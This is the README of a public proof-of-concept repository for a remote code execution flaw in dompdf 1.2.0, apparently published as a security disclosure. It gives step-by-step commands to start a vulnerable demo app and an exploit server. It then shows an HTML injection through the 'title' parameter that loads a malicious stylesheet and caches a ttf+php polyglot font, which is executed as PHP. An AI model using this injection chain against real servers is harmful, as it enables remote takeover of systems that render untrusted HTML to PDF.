Skip to content

positive-security/dompdf-rce

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

RCE exploit for dompdf

This repository contains a vulnerable demo application using dompdf 1.2.0 and an exploit that achieves remote code execution via a ttf+php polyglot file.

Exploit Overview

For more details, please visit https://positive.security/blog/dompdf-rce

Instructions

  1. Run the demo application
$ cd application
$ php -S localhost:9000
  1. Run the exploit server
$ cd exploit
$ php -S localhost:9001
  1. Trigger the exploit
http://localhost:9000/index.php?pdf&title=<link rel=stylesheet href='http://localhost:9001/exploit.css'>
  1. Access the cached php "font" file and execute phpinfo()
http://localhost:9000/dompdf/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php

Please note: In case you're using different domains or ports, please edit exploit/exploit.css accordingly and check application/dompdf/lib/fonts for the full font filename.

About

RCE exploit for dompdf

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages